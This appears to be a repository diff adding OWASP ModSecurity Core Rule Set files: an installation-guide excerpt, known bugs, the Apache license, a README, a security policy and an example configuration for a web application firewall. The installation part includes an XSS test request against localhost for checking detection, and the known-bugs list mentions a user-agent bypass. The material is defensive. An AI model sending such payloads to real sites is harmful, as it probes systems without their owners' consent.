include owasp-modsecurity-crs/rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf
```
6. Restart web server and ensure it starts without errors
7. Make sure your web sites are still running fine.
8. Proceed to the section "Testing the Installation" below.
Testing the Installation
========================
To test your installation you should be able to use any number
of attacks. A typical request which should trigger CRS would be
```http://localhost/?param="><script>alert(1);</script>```
Upon sending this request you should see events reported in the
error log (nginx apache) or the event viewer (IIS).
If have not changed the defaults with regards to anomaly scoring,
blocking and sampling percentage, then this request should have
been blocked and access forbidden. Likewise if you have configured
ModSecurity debug logging and/or audit logging this event should
log to these locations as well.
OWASP CRS Configuration
=======================
The crs-setup.conf file includes management rules
and directives that can control important CRS functions.
The crs-setup.conf file comes with extensive comments.
This section here brings only the essential parts.
By default we do not include settings within the crs-setup.conf
that configure ModSecurity itself. Instead those configuration
settings are set during the installation of ModSecurity proper.
An example for such such a
configuration file is available via the ModSecurity project
(https://github.com/SpiderLabs/ModSecurity/blob/master/modsecurity.conf-recommended).
Be aware the crs-setup.conf file DOES specify
configuration directives such as SecDefaultAction. The default
is the anomaly scoring mode with the appropriate
SecDefaultAction as defined in the crs-setup.conf.
Alternative configuration modes are supported and explained
in crs-setup.conf.
The default anomaly/correlation mode establishes an incoming
anomaly score threshold of 5 and an outgoing anomaly score
threshold of 4. The default installation has been tuned to
reduce false positives in a way that will allow most requests
to pass in this default setup.
However, testing the setup and tuning false positives
before going to production is vital. This is especially true
if you raise the paranoia level with is set to 1 by default.
Higher paranoia levels ranging from 2 to 4 include more
aggressive rules which will raise additional false positives
but also raise the security level of your service.
If you are unsure about the performance impact of the CRS
or if you are unsure about the number of false positives, then
you may want to use the sampling percentage. This number,
which is set to 100 by default, controls the percentage
of requests which is funneled into the CRS. Fresh installs
on high traffic sites are advised to start with a low, or
very low number of percentages and raise the number
slowly up to 100. Be aware that any number below 100 allows
a random number of requests to bypass the ruleset completely.
Update the TX policy settings for allowed Request Methods, File
Extensions, maximum numbers of arguments, etc to better reflect
your environment that is being protected.
Make sure your GeoIP and Project Honeypot settings are specified
if you are using them.
The GeoIP database is no longer included with the CRS. Instead
you are advised to download it regularly.
The use of Project Honeypot requires a
free API key. These require an account but can be obtained at
https://www.projecthoneypot.org/httpbl_configure.php.
Be sure to check out the other settings present within the
crs-setup.conf file. There are many other options that have to
do with aspects of web application security that are beyond
this document but are well explained in crs-setup.conf.

50
core/modsecurity/files/coreruleset/KNOWN_BUGS Normal file
View File

@@ -0,0 +1,50 @@
== OWASP ModSecurity Core Rule Set (CRS) KNOWN BUGS ==
== Report Bugs/Issues to GitHub Issues Tracker or the mailinglist ==
* https://github.com/SpiderLabs/owasp-modsecurity-crs/issues
or the CRS Google Group at
* https://groups.google.com/a/owasp.org/forum/#!forum/modsecurity-core-rule-set-project
* There are still false positives for standard web applications in
the default install (paranoia level 1). Please report these when
you encounter them.
False Positives from paranoia level 2 rules are less interesting,
as we expect users to write exclusion rules for their alerts in
the higher paranoia levels.
* Permanent blocking of clients is based on a previous user agent / IP
combination. Changing the user agent will thus allow to bypass
this new filter. The plan is to allow for a purely IP based
filter in the future.
* Apache 2.4 prior to 2.4.11 is affected by a bug in parsing multi-line
configuration directives, which causes Apache to fail during startup
with an error such as:
Error parsing actions: Unknown action: \\
Action 'configtest' failed.
This bug is known to plague RHEL/Centos 7 below v7.4 or
httpd v2.4.6 release 67 and Ubuntu 14.04 LTS users.
https://bz.apache.org/bugzilla/show_bug.cgi?id=55910
We advise to upgrade your Apache version. If upgrading is not possible,
we have provided a script in the util/join-multiline-rules directory
which converts the rules into a format that works around the bug.
You have to re-run this script whenever you modify or update
the CRS rules.
* Debian up to and including Jessie lacks YAJL/JSON support in ModSecurity,
which causes the following error in the Apache ErrorLog or SecAuditLog:
'ModSecurity: JSON support was not enabled.'
JSON support was enabled in Debian's package version 2.8.0-4 (Nov 2014).
You can either use backports.debian.org to install the latest ModSecurity
release or disable rule id 200001.
* As of CRS version 3.0.1, support has been added for the application/soap+xml MIME
type by default, as specified in RFC 3902. OF IMPORTANCE, application/soap+xml is
indicative that XML will be provided. In accordance with this, ModSecurity's XML
Request Body Processor should also be configured to support this MIME type. Within
the ModSecurity project, commit 5e4e2af
(https://github.com/SpiderLabs/ModSecurity/commit/5e4e2af7a6f07854fee6ed36ef4a381d4e03960e)
has been merged to support this endeavour. However, if you are running a modified or
preexisting version of the modsecurity.conf provided by this repository, you may
wish to upgrade rule '200000' accordingly. The rule now appears as follows:
```
SecRule REQUEST_HEADERS:Content-Type "(?:application(?:/soap\+|/)|text/)xml" \
"id:'200000',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=XML"
```

201
core/modsecurity/files/coreruleset/LICENSE Normal file
View File

@@ -0,0 +1,201 @@
Apache License
Version 2.0, January 2004
http://www.apache.org/licenses/
TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
1. Definitions.
"License" shall mean the terms and conditions for use, reproduction,
and distribution as defined by Sections 1 through 9 of this document.
"Licensor" shall mean the copyright owner or entity authorized by
the copyright owner that is granting the License.
"Legal Entity" shall mean the union of the acting entity and all
other entities that control, are controlled by, or are under common
control with that entity. For the purposes of this definition,
"control" means (i) the power, direct or indirect, to cause the
direction or management of such entity, whether by contract or
otherwise, or (ii) ownership of fifty percent (50%) or more of the
outstanding shares, or (iii) beneficial ownership of such entity.
"You" (or "Your") shall mean an individual or Legal Entity
exercising permissions granted by this License.
"Source" form shall mean the preferred form for making modifications,
including but not limited to software source code, documentation
source, and configuration files.
"Object" form shall mean any form resulting from mechanical
transformation or translation of a Source form, including but
not limited to compiled object code, generated documentation,
and conversions to other media types.
"Work" shall mean the work of authorship, whether in Source or
Object form, made available under the License, as indicated by a
copyright notice that is included in or attached to the work
(an example is provided in the Appendix below).
"Derivative Works" shall mean any work, whether in Source or Object
form, that is based on (or derived from) the Work and for which the
editorial revisions, annotations, elaborations, or other modifications
represent, as a whole, an original work of authorship. For the purposes
of this License, Derivative Works shall not include works that remain
separable from, or merely link (or bind by name) to the interfaces of,
the Work and Derivative Works thereof.
"Contribution" shall mean any work of authorship, including
the original version of the Work and any modifications or additions
to that Work or Derivative Works thereof, that is intentionally
submitted to Licensor for inclusion in the Work by the copyright owner
or by an individual or Legal Entity authorized to submit on behalf of
the copyright owner. For the purposes of this definition, "submitted"
means any form of electronic, verbal, or written communication sent
to the Licensor or its representatives, including but not limited to
communication on electronic mailing lists, source code control systems,
and issue tracking systems that are managed by, or on behalf of, the
Licensor for the purpose of discussing and improving the Work, but
excluding communication that is conspicuously marked or otherwise
designated in writing by the copyright owner as "Not a Contribution."
"Contributor" shall mean Licensor and any individual or Legal Entity
on behalf of whom a Contribution has been received by Licensor and
subsequently incorporated within the Work.
2. Grant of Copyright License. Subject to the terms and conditions of
this License, each Contributor hereby grants to You a perpetual,
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
copyright license to reproduce, prepare Derivative Works of,
publicly display, publicly perform, sublicense, and distribute the
Work and such Derivative Works in Source or Object form.
3. Grant of Patent License. Subject to the terms and conditions of
this License, each Contributor hereby grants to You a perpetual,
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
(except as stated in this section) patent license to make, have made,
use, offer to sell, sell, import, and otherwise transfer the Work,
where such license applies only to those patent claims licensable
by such Contributor that are necessarily infringed by their
Contribution(s) alone or by combination of their Contribution(s)
with the Work to which such Contribution(s) was submitted. If You
institute patent litigation against any entity (including a
cross-claim or counterclaim in a lawsuit) alleging that the Work
or a Contribution incorporated within the Work constitutes direct
or contributory patent infringement, then any patent licenses
granted to You under this License for that Work shall terminate
as of the date such litigation is filed.
4. Redistribution. You may reproduce and distribute copies of the
Work or Derivative Works thereof in any medium, with or without
modifications, and in Source or Object form, provided that You
meet the following conditions:
(a) You must give any other recipients of the Work or
Derivative Works a copy of this License; and
(b) You must cause any modified files to carry prominent notices
stating that You changed the files; and
(c) You must retain, in the Source form of any Derivative Works
that You distribute, all copyright, patent, trademark, and
attribution notices from the Source form of the Work,
excluding those notices that do not pertain to any part of
the Derivative Works; and
(d) If the Work includes a "NOTICE" text file as part of its
distribution, then any Derivative Works that You distribute must
include a readable copy of the attribution notices contained
within such NOTICE file, excluding those notices that do not
pertain to any part of the Derivative Works, in at least one
of the following places: within a NOTICE text file distributed
as part of the Derivative Works; within the Source form or
documentation, if provided along with the Derivative Works; or,
within a display generated by the Derivative Works, if and
wherever such third-party notices normally appear. The contents
of the NOTICE file are for informational purposes only and
do not modify the License. You may add Your own attribution
notices within Derivative Works that You distribute, alongside
or as an addendum to the NOTICE text from the Work, provided
that such additional attribution notices cannot be construed
as modifying the License.
You may add Your own copyright statement to Your modifications and
may provide additional or different license terms and conditions
for use, reproduction, or distribution of Your modifications, or
for any such Derivative Works as a whole, provided Your use,
reproduction, and distribution of the Work otherwise complies with
the conditions stated in this License.
5. Submission of Contributions. Unless You explicitly state otherwise,
any Contribution intentionally submitted for inclusion in the Work
by You to the Licensor shall be under the terms and conditions of
this License, without any additional terms or conditions.
Notwithstanding the above, nothing herein shall supersede or modify
the terms of any separate license agreement you may have executed
with Licensor regarding such Contributions.
6. Trademarks. This License does not grant permission to use the trade
names, trademarks, service marks, or product names of the Licensor,
except as required for reasonable and customary use in describing the
origin of the Work and reproducing the content of the NOTICE file.
7. Disclaimer of Warranty. Unless required by applicable law or
agreed to in writing, Licensor provides the Work (and each
Contributor provides its Contributions) on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
implied, including, without limitation, any warranties or conditions
of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
PARTICULAR PURPOSE. You are solely responsible for determining the
appropriateness of using or redistributing the Work and assume any
risks associated with Your exercise of permissions under this License.
8. Limitation of Liability. In no event and under no legal theory,
whether in tort (including negligence), contract, or otherwise,
unless required by applicable law (such as deliberate and grossly
negligent acts) or agreed to in writing, shall any Contributor be
liable to You for damages, including any direct, indirect, special,
incidental, or consequential damages of any character arising as a
result of this License or out of the use or inability to use the
Work (including but not limited to damages for loss of goodwill,
work stoppage, computer failure or malfunction, or any and all
other commercial damages or losses), even if such Contributor
has been advised of the possibility of such damages.
9. Accepting Warranty or Additional Liability. While redistributing
the Work or Derivative Works thereof, You may choose to offer,
and charge a fee for, acceptance of support, warranty, indemnity,
or other liability obligations and/or rights consistent with this
License. However, in accepting such obligations, You may act only
on Your own behalf and on Your sole responsibility, not on behalf
of any other Contributor, and only if You agree to indemnify,
defend, and hold each Contributor harmless for any liability
incurred by, or claims asserted against, such Contributor by reason
of your accepting any such warranty or additional liability.
END OF TERMS AND CONDITIONS
APPENDIX: How to apply the Apache License to your work.
To apply the Apache License to your work, attach the following
boilerplate notice, with the fields enclosed by brackets "[]"
replaced with your own identifying information. (Don't include
the brackets!) The text should be enclosed in the appropriate
comment syntax for the file format. We also recommend that a
file or class name and description of purpose be included on the
same "printed page" as the copyright notice for easier
identification within third-party archives.
Copyright 2006 the OWASP Core Rule Set contributors
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.

32
core/modsecurity/files/coreruleset/README.md Normal file
View File

@@ -0,0 +1,32 @@
![GHA build v3.3/dev](https://github.com/coreruleset/coreruleset/workflows/Regression%20Tests/badge.svg?branch=v3.3%2Fdev)
![GHA build v3.2/dev](https://github.com/coreruleset/coreruleset/workflows/Regression%20Tests/badge.svg?branch=v3.2%2Fdev)
![GHA build v3.1/dev](https://github.com/coreruleset/coreruleset/workflows/Regression%20Tests/badge.svg?branch=v3.1%2Fdev)
[![OWASP Flagship](https://img.shields.io/badge/owasp-flagship%20project-38a047.svg)](https://owasp.org/projects/)
[![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/1390/badge)](https://bestpractices.coreinfrastructure.org/projects/1390)
[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)
# OWASP ModSecurity Core Rule Set (CRS)
The OWASP ModSecurity Core Rule Set (CRS) is a set of generic attack detection rules for use with ModSecurity or compatible web application firewalls. The CRS aims to protect web applications from a wide range of attacks, including the OWASP Top Ten, with a minimum of false alerts.
## CRS Resources
Please see the [OWASP ModSecurity Core Rule Set page](https://coreruleset.org/) to get introduced to the CRS and view resources on installation, configuration, and working with the CRS.
## Contributing to the CRS
We strive to make the OWASP ModSecurity CRS accessible to a wide audience of beginner and experienced users. We are interested in hearing any bug reports, false positive alert reports, evasions, usability issues, and suggestions for new detections.
[Create an issue on GitHub](https://github.com/coreruleset/coreruleset/issues) to report a false positive or false negative (evasion). Please include your installed version and the relevant portions of your ModSecurity audit log.
[Sign up for our Google Group](https://groups.google.com/a/owasp.org/forum/#!forum/modsecurity-core-rule-set-project) to ask general usage questions and participate in discussions on the CRS. Also [here](https://lists.owasp.org/pipermail/owasp-modsecurity-core-rule-set/index) you can find the archives for the previous mailing list.
[Join the #coreruleset channel on OWASP Slack](http://owaspslack.com) to chat about the CRS.
## License
Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
The OWASP ModSecurity Core Rule Set is distributed under Apache Software License (ASL) version 2. Please see the enclosed LICENSE file for full details.

35
core/modsecurity/files/coreruleset/SECURITY.md Normal file
View File

@@ -0,0 +1,35 @@
# Security Policy
## Supported Versions
OWASP CRS has two types of releases, Major releases (3.0.0, 3.1.0, 3.2.0 etc.) and point releases (3.0.1, 3.0.2 etc.).
For more information see our [wiki](https://github.com/SpiderLabs/owasp-modsecurity-crs/wiki/Release-Policy).
The OWASP CRS officially supports the two point releases with security patching preceding the current major release .
We are happy to receive and merge PR's that address security issues in older versions of the project, but the team itself may choose not to fix these.
Along those lines, OWASP CRS team may not issue security notifications for unsupported software.
| Version | Supported |
| --------- | ------------------ |
| 3.3.x-dev | :white_check_mark: |
| 3.2.x | :white_check_mark: |
| 3.1.x | :white_check_mark: |
| 3.0.x | :x: |
## Reporting a Vulnerability
We strive to make the OWASP ModSecurity CRS accessible to a wide audience of beginner and experienced users.
We welcome bug reports, false positive alert reports, evasions, usability issues, and suggestions for new detections.
Submit these types of non-vulnerability related issues via Github.
Please include your installed version and the relevant portions of your audit log.
False negative or common bypasses should [create an issue](https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/new) so they can be addressed.
Do this before submitting a vulnerability using our email:
1) Verify that you have the latest version of OWASP CRS.
2) Validate which Paranoia Level this bypass applies to. If it works in PL4, please send us an email.
3) If you detected anything that causes unexpected behavior of the engine via manipulation of existing CRS provided rules, please send it by email.
Our email is [security@coreruleset.org](mailto:security@coreruleset.org). You can send us encrypted email using [this key](https://coreruleset.org/security.asc), (fingerprint: `3600 6F0E 0BA1 6783 2158 8211 38EE ACA1 AB8A 6E72`).
We are happy to work with the community to provide CVE identifiers for any discovered security issues if requested.
If in doubt, feel free to reach out to us!

829
core/modsecurity/files/coreruleset/crs-setup.conf.example Normal file
View File

@@ -0,0 +1,829 @@
# ------------------------------------------------------------------------
# OWASP ModSecurity Core Rule Set ver.3.3.2
# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
#
# The OWASP ModSecurity Core Rule Set is distributed under
# Apache Software License (ASL) version 2
# Please see the enclosed LICENSE file for full details.
# ------------------------------------------------------------------------
#
# -- [[ Introduction ]] --------------------------------------------------------
#
# The OWASP ModSecurity Core Rule Set (CRS) is a set of generic attack
# detection rules that provide a base level of protection for any web
# application. They are written for the open source, cross-platform
# ModSecurity Web Application Firewall.
#
# See also:
# https://coreruleset.org/
# https://github.com/SpiderLabs/owasp-modsecurity-crs
# https://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_Project
#
#
# -- [[ System Requirements ]] -------------------------------------------------
#
# CRS requires ModSecurity version 2.8.0 or above.
# We recommend to always use the newest ModSecurity version.
#
# The configuration directives/settings in this file are used to control
# the OWASP ModSecurity CRS. These settings do **NOT** configure the main
# ModSecurity settings (modsecurity.conf) such as SecRuleEngine,
# SecRequestBodyAccess, SecAuditEngine, SecDebugLog, and XML processing.
#
# The CRS assumes that modsecurity.conf has been loaded. It is bundled with
# ModSecurity. If you don't have it, you can get it from:
# 2.x: https://raw.githubusercontent.com/SpiderLabs/ModSecurity/v2/master/modsecurity.conf-recommended
# 3.x: https://raw.githubusercontent.com/SpiderLabs/ModSecurity/v3/master/modsecurity.conf-recommended
#
# The order of file inclusion in your webserver configuration should always be:
# 1. modsecurity.conf
# 2. crs-setup.conf (this file)
# 3. rules/*.conf (the CRS rule files)
#
# Please refer to the INSTALL file for detailed installation instructions.
#
#
# -- [[ Mode of Operation: Anomaly Scoring vs. Self-Contained ]] ---------------
#
# The CRS can run in two modes:
#
# -- [[ Anomaly Scoring Mode (default) ]] --
# In CRS3, anomaly mode is the default and recommended mode, since it gives the
# most accurate log information and offers the most flexibility in setting your
# blocking policies. It is also called "collaborative detection mode".
# In this mode, each matching rule increases an 'anomaly score'.
# At the conclusion of the inbound rules, and again at the conclusion of the
# outbound rules, the anomaly score is checked, and the blocking evaluation
# rules apply a disruptive action, by default returning an error 403.
#
# -- [[ Self-Contained Mode ]] --
# In this mode, rules apply an action instantly. This was the CRS2 default.
# It can lower resource usage, at the cost of less flexibility in blocking policy
# and less informative audit logs (only the first detected threat is logged).
# Rules inherit the disruptive action that you specify (i.e. deny, drop, etc).
# The first rule that matches will execute this action. In most cases this will
# cause evaluation to stop after the first rule has matched, similar to how many
# IDSs function.
#
# -- [[ Alert Logging Control ]] --
# In the mode configuration, you must also adjust the desired logging options.
# There are three common options for dealing with logging. By default CRS enables
# logging to the webserver error log (or Event viewer) plus detailed logging to
# the ModSecurity audit log (configured under SecAuditLog in modsecurity.conf).
#
# - To log to both error log and ModSecurity audit log file, use: "log,auditlog"
# - To log *only* to the ModSecurity audit log file, use: "nolog,auditlog"
# - To log *only* to the error log file, use: "log,noauditlog"
#
# Examples for the various modes follow.
# You must leave one of the following options enabled.
# Note that you must specify the same line for phase:1 and phase:2.
#
# Default: Anomaly Scoring mode, log to error log, log to ModSecurity audit log
# - By default, offending requests are blocked with an error 403 response.
# - To change the disruptive action, see RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example
# and review section 'Changing the Disruptive Action for Anomaly Mode'.
# - In Apache, you can use ErrorDocument to show a friendly error page or
# perform a redirect: https://httpd.apache.org/docs/2.4/custom-error.html
#
SecDefaultAction "phase:1,log,auditlog,pass"
SecDefaultAction "phase:2,log,auditlog,pass"
# Example: Anomaly Scoring mode, log only to ModSecurity audit log
# - By default, offending requests are blocked with an error 403 response.
# - To change the disruptive action, see RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example
# and review section 'Changing the Disruptive Action for Anomaly Mode'.
# - In Apache, you can use ErrorDocument to show a friendly error page or
# perform a redirect: https://httpd.apache.org/docs/2.4/custom-error.html
#
# SecDefaultAction "phase:1,nolog,auditlog,pass"
# SecDefaultAction "phase:2,nolog,auditlog,pass"
# Example: Self-contained mode, return error 403 on blocking
# - In this configuration the default disruptive action becomes 'deny'. After a
# rule triggers, it will stop processing the request and return an error 403.
# - You can also use a different error status, such as 404, 406, et cetera.
# - In Apache, you can use ErrorDocument to show a friendly error page or
# perform a redirect: https://httpd.apache.org/docs/2.4/custom-error.html
#
# SecDefaultAction "phase:1,log,auditlog,deny,status:403"
# SecDefaultAction "phase:2,log,auditlog,deny,status:403"
# Example: Self-contained mode, redirect back to homepage on blocking
# - In this configuration the 'tag' action includes the Host header data in the
# log. This helps to identify which virtual host triggered the rule (if any).
# - Note that this might cause redirect loops in some situations; for example
# if a Cookie or User-Agent header is blocked, it will also be blocked when
# the client subsequently tries to access the homepage. You can also redirect
# to another custom URL.
# SecDefaultAction "phase:1,log,auditlog,redirect:'http://%{request_headers.host}/',tag:'Host: %{request_headers.host}'"
# SecDefaultAction "phase:2,log,auditlog,redirect:'http://%{request_headers.host}/',tag:'Host: %{request_headers.host}'"
#
# -- [[ Paranoia Level Initialization ]] ---------------------------------------
#
# The Paranoia Level (PL) setting allows you to choose the desired level
# of rule checks that will add to your anomaly scores.
#
# With each paranoia level increase, the CRS enables additional rules
# giving you a higher level of security. However, higher paranoia levels
# also increase the possibility of blocking some legitimate traffic due to
# false alarms (also named false positives or FPs). If you use higher
# paranoia levels, it is likely that you will need to add some exclusion
# rules for certain requests and applications receiving complex input.
#
# - A paranoia level of 1 is default. In this level, most core rules
# are enabled. PL1 is advised for beginners, installations
# covering many different sites and applications, and for setups
# with standard security requirements.
# At PL1 you should face FPs rarely. If you encounter FPs, please
# open an issue on the CRS GitHub site and don't forget to attach your
# complete Audit Log record for the request with the issue.
# - Paranoia level 2 includes many extra rules, for instance enabling
# many regexp-based SQL and XSS injection protections, and adding
# extra keywords checked for code injections. PL2 is advised
# for moderate to experienced users desiring more complete coverage
# and for installations with elevated security requirements.
# PL2 comes with some FPs which you need to handle.
# - Paranoia level 3 enables more rules and keyword lists, and tweaks
# limits on special characters used. PL3 is aimed at users experienced
# at the handling of FPs and at installations with a high security
# requirement.
# - Paranoia level 4 further restricts special characters.
# The highest level is advised for experienced users protecting
# installations with very high security requirements. Running PL4 will
# likely produce a very high number of FPs which have to be
# treated before the site can go productive.
#
# All rules will log their PL to the audit log;
# example: [tag "paranoia-level/2"]. This allows you to deduct from the
# audit log how the WAF behavior is affected by paranoia level.
#
# It is important to also look into the variable
# tx.enforce_bodyproc_urlencoded (Enforce Body Processor URLENCODED)
# defined below. Enabling it closes a possible bypass of CRS.
#
# Uncomment this rule to change the default:
#
#SecAction \
# "id:900000,\
# phase:1,\
# nolog,\
# pass,\
# t:none,\
# setvar:tx.paranoia_level=1"
# It is possible to execute rules from a higher paranoia level but not include
# them in the anomaly scoring. This allows you to take a well-tuned system on
# paranoia level 1 and add rules from paranoia level 2 without having to fear
# the new rules would lead to false positives that raise your score above the
# threshold.
# This optional feature is enabled by uncommenting the following rule and
# setting the tx.executing_paranoia_level.
# Technically, rules up to the level defined in tx.executing_paranoia_level
# will be executed, but only the rules up to tx.paranoia_level affect the
# anomaly scores.
# By default, tx.executing_paranoia_level is set to tx.paranoia_level.
# tx.executing_paranoia_level must not be lower than tx.paranoia_level.
#
# Please notice that setting tx.executing_paranoia_level to a higher paranoia
# level results in a performance impact that is equally high as setting
# tx.paranoia_level to said level.
#
#SecAction \
# "id:900001,\
# phase:1,\
# nolog,\
# pass,\
# t:none,\
# setvar:tx.executing_paranoia_level=1"
#
# -- [[ Enforce Body Processor URLENCODED ]] -----------------------------------
#
# ModSecurity selects the body processor based on the Content-Type request
# header. But clients are not always setting the Content-Type header for their
# request body payloads. This will leave ModSecurity with limited vision into
# the payload. The variable tx.enforce_bodyproc_urlencoded lets you force the
# URLENCODED body processor in these situations. This is off by default, as it
# implies a change of the behaviour of ModSecurity beyond CRS (the body
# processor applies to all rules, not only CRS) and because it may lead to
# false positives already on paranoia level 1. However, enabling this variable
# closes a possible bypass of CRS so it should be considered.
#
# Uncomment this rule to change the default:
#
#SecAction \
# "id:900010,\
# phase:1,\
# nolog,\
# pass,\
# t:none,\
# setvar:tx.enforce_bodyproc_urlencoded=1"
#
# -- [[ Anomaly Mode Severity Levels ]] ----------------------------------------
#
# Each rule in the CRS has an associated severity level.
# These are the default scoring points for each severity level.
# These settings will be used to increment the anomaly score if a rule matches.
# You may adjust these points to your liking, but this is usually not needed.
#
# - CRITICAL severity: Anomaly Score of 5.
# Mostly generated by the application attack rules (93x and 94x files).
# - ERROR severity: Anomaly Score of 4.
# Generated mostly from outbound leakage rules (95x files).
# - WARNING severity: Anomaly Score of 3.
# Generated mostly by malicious client rules (91x files).
# - NOTICE severity: Anomaly Score of 2.
# Generated mostly by the protocol rules (92x files).
#
# In anomaly mode, these scores are cumulative.
# So it's possible for a request to hit multiple rules.
#
# (Note: In this file, we use 'phase:1' to set CRS configuration variables.
# In general, 'phase:request' is used. However, we want to make absolutely sure
# that all configuration variables are set before the CRS rules are processed.)
#
#SecAction \
# "id:900100,\
# phase:1,\
# nolog,\
# pass,\
# t:none,\
# setvar:tx.critical_anomaly_score=5,\
# setvar:tx.error_anomaly_score=4,\
# setvar:tx.warning_anomaly_score=3,\
# setvar:tx.notice_anomaly_score=2"
#
# -- [[ Anomaly Mode Blocking Threshold Levels ]] ------------------------------
#
# Here, you can specify at which cumulative anomaly score an inbound request,
# or outbound response, gets blocked.
#
# Most detected inbound threats will give a critical score of 5.
# Smaller violations, like violations of protocol/standards, carry lower scores.
#
# [ At default value ]
# If you keep the blocking thresholds at the defaults, the CRS will work
# similarly to previous CRS versions: a single critical rule match will cause
# the request to be blocked and logged.
#
# [ Using higher values ]
# If you want to make the CRS less sensitive, you can increase the blocking
# thresholds, for instance to 7 (which would require multiple rule matches
# before blocking) or 10 (which would require at least two critical alerts - or
# a combination of many lesser alerts), or even higher. However, increasing the
# thresholds might cause some attacks to bypass the CRS rules or your policies.
#
# [ New deployment strategy: Starting high and decreasing ]
# It is a common practice to start a fresh CRS installation with elevated
# anomaly scoring thresholds (>100) and then lower the limits as your
# confidence in the setup grows. You may also look into the Sampling
# Percentage section below for a different strategy to ease into a new
# CRS installation.
#
# [ Anomaly Threshold / Paranoia Level Quadrant ]
#
# High Anomaly Limit | High Anomaly Limit
# Low Paranoia Level | High Paranoia Level
# -> Fresh Site | -> Experimental Site
# ------------------------------------------------------
# Low Anomaly Limit | Low Anomaly Limit
# Low Paranoia Level | High Paranoia Level
# -> Standard Site | -> High Security Site
#
# Uncomment this rule to change the defaults:
#
#SecAction \
# "id:900110,\
# phase:1,\
# nolog,\
# pass,\
# t:none,\
# setvar:tx.inbound_anomaly_score_threshold=5,\
# setvar:tx.outbound_anomaly_score_threshold=4"
#
# -- [[ Application Specific Rule Exclusions ]] ----------------------------------------
#
# Some well-known applications may undertake actions that appear to be
# malicious. This includes actions such as allowing HTML or Javascript within
# parameters. In such cases the CRS aims to prevent false positives by allowing
# administrators to enable prebuilt, application specific exclusions on an
# application by application basis.
# These application specific exclusions are distinct from the rules that would
# be placed in the REQUEST-900-EXCLUSION-RULES-BEFORE-CRS configuration file as
# they are prebuilt for specific applications. The 'REQUEST-900' file is
# designed for users to add their own custom exclusions. Note, using these
# application specific exclusions may loosen restrictions of the CRS,
# especially if used with an application they weren't designed for. As a result
# they should be applied with care.
# To use this functionality you must specify a supported application. To do so
# uncomment rule 900130. In addition to uncommenting the rule you will need to
# specify which application(s) you'd like to enable exclusions for. Only a
# (very) limited set of applications are currently supported, please use the
# filenames prefixed with 'REQUEST-903' to guide you in your selection.
# Such filenames use the following convention:
# REQUEST-903.9XXX-{APPNAME}-EXCLUSIONS-RULES.conf
#
# It is recommended if you run multiple web applications on your site to limit
# the effects of the exclusion to only the path where the excluded webapp
# resides using a rule similar to the following example:
# SecRule REQUEST_URI "@beginsWith /wordpress/" setvar:tx.crs_exclusions_wordpress=1
#
# Modify and uncomment this rule to select which application:
#
#SecAction \
# "id:900130,\
# phase:1,\
# nolog,\
# pass,\
# t:none,\
# setvar:tx.crs_exclusions_cpanel=1,\
# setvar:tx.crs_exclusions_drupal=1,\
# setvar:tx.crs_exclusions_dokuwiki=1,\
# setvar:tx.crs_exclusions_nextcloud=1,\
# setvar:tx.crs_exclusions_wordpress=1,\
# setvar:tx.crs_exclusions_xenforo=1"
#
# -- [[ HTTP Policy Settings ]] ------------------------------------------------
#
# This section defines your policies for the HTTP protocol, such as:
# - allowed HTTP versions, HTTP methods, allowed request Content-Types
# - forbidden file extensions (e.g. .bak, .sql) and request headers (e.g. Proxy)
#
# These variables are used in the following rule files:
# - REQUEST-911-METHOD-ENFORCEMENT.conf
# - REQUEST-912-DOS-PROTECTION.conf
# - REQUEST-920-PROTOCOL-ENFORCEMENT.conf
# HTTP methods that a client is allowed to use.
# Default: GET HEAD POST OPTIONS
# Example: for RESTful APIs, add the following methods: PUT PATCH DELETE
# Example: for WebDAV, add the following methods: CHECKOUT COPY DELETE LOCK
# MERGE MKACTIVITY MKCOL MOVE PROPFIND PROPPATCH PUT UNLOCK
# Uncomment this rule to change the default.
#SecAction \
# "id:900200,\
# phase:1,\
# nolog,\
# pass,\
# t:none,\
# setvar:'tx.allowed_methods=GET HEAD POST OPTIONS'"
# Content-Types that a client is allowed to send in a request.
# Default: |application/x-www-form-urlencoded| |multipart/form-data| |multipart/related|
# |text/xml| |application/xml| |application/soap+xml| |application/x-amf| |application/json|
# |application/cloudevents+json| |application/cloudevents-batch+json| |application/octet-stream|
# |application/csp-report| |application/xss-auditor-report| |text/plain|
# Uncomment this rule to change the default.
#SecAction \
# "id:900220,\
# phase:1,\
# nolog,\
# pass,\
# t:none,\
# setvar:'tx.allowed_request_content_type=|application/x-www-form-urlencoded| |multipart/form-data| |multipart/related| |text/xml| |application/xml| |application/soap+xml| |application/x-amf| |application/json| |application/cloudevents+json| |application/cloudevents-batch+json| |application/octet-stream| |application/csp-report| |application/xss-auditor-report| |text/plain|'"
# Allowed HTTP versions.
# Default: HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0
# Example for legacy clients: HTTP/0.9 HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0
# Note that some web server versions use 'HTTP/2', some 'HTTP/2.0', so
# we include both version strings by default.
# Uncomment this rule to change the default.
#SecAction \
# "id:900230,\
# phase:1,\
# nolog,\
# pass,\
# t:none,\
# setvar:'tx.allowed_http_versions=HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0'"
# Forbidden file extensions.
